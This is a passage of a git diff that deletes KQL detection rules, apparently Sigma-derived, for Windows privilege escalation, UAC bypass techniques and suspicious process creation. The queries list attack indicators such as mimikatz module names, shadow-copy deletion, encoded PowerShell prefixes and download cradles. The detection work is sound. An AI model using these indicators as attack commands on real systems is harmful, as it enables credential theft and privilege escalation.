-| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql b/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql
deleted file mode 100644
index 02313ce1..00000000
--- a/Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/07/01
-// Level: high
-// Description: Detects a suspicious printer driver installation with an empty Manufacturer value
-// Tags: attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceRegistryEvents
-| where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey contains "\\CutePDF Writer v4.0" or RegistryKey contains "\\Version-3\\PDF24" or (RegistryKey contains "\\VNC Printer (PS)" or RegistryKey contains "\\VNC Printer (UD)"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 7ac4d66c..00000000
--- a/Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql b/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql b/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql
deleted file mode 100644
index 20bd7e66..00000000
--- a/Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/11/11
-// Level: medium
-// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
-// Tags: attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ")
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql b/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql
deleted file mode 100644
index 76673450..00000000
--- a/Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
-DeviceProcessEvents
-| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" 
or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql b/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql
deleted file mode 100644
index d7bc0338..00000000
--- a/Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/08/19
-// Level: medium
-// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity.
-Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
-
-// Tags: attack.privilege_escalation, attack.t1546.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "HKEY_CURRENT_USER\\Control Panel\\Desktop" or ProcessCommandLine contains "HKCU\\Control Panel\\Desktop") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/v ScreenSaveActive" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 1" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaveTimeout" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v ScreenSaverIsSecure" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d 0" and ProcessCommandLine contains "/f") or (ProcessCommandLine contains "/v SCRNSAVE.EXE" and ProcessCommandLine contains "/t REG_SZ" and ProcessCommandLine contains "/d " and ProcessCommandLine contains ".scr" and ProcessCommandLine contains "/f"))
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Service_Path_Modification.kql b/Privilege Escalation/Suspicious_Service_Path_Modification.kql
deleted file mode 100644
index f0c3811c..00000000
--- a/Privilege Escalation/Suspicious_Service_Path_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: high
-// Description: Detects service path modification via the "sc" binary to a suspicious command or path
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql b/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql
deleted file mode 100644
index 9e6385cb..00000000
--- a/Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
-// Date: 2021/07/11
-// Level: high
-// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
-// Tags: attack.execution, attack.t1203, attack.privilege_escalation, attack.t1068
-DeviceProcessEvents
-| where (ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or 
ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql b/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
deleted file mode 100644
index 8d57f867..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
deleted file mode 100644
index 503d8c5f..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql b/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
deleted file mode 100644
index 979b06ac..00000000
--- a/Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql b/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql
deleted file mode 100644
index ba29c60d..00000000
--- a/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/31
-// Level: high
-// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql b/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
deleted file mode 100644
index f8815880..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql b/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql
deleted file mode 100644
index c912f517..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
deleted file mode 100644
index c45c8dd3..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
deleted file mode 100644
index b14f6498..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql b/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql
deleted file mode 100644
index 949e3b2b..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_DismHost.kql b/Privilege Escalation/UAC_Bypass_Using_DismHost.kql
deleted file mode 100644
index 63f130be..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_DismHost.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql b/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql
deleted file mode 100644
index 3043fd99..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql b/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
deleted file mode 100644
index 974b22fe..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/22
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql
deleted file mode 100644
index 26df3a86..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
deleted file mode 100644
index 25b12cc5..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql
deleted file mode 100644
index 1ca85fad..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql
deleted file mode 100644
index eaf21560..00000000
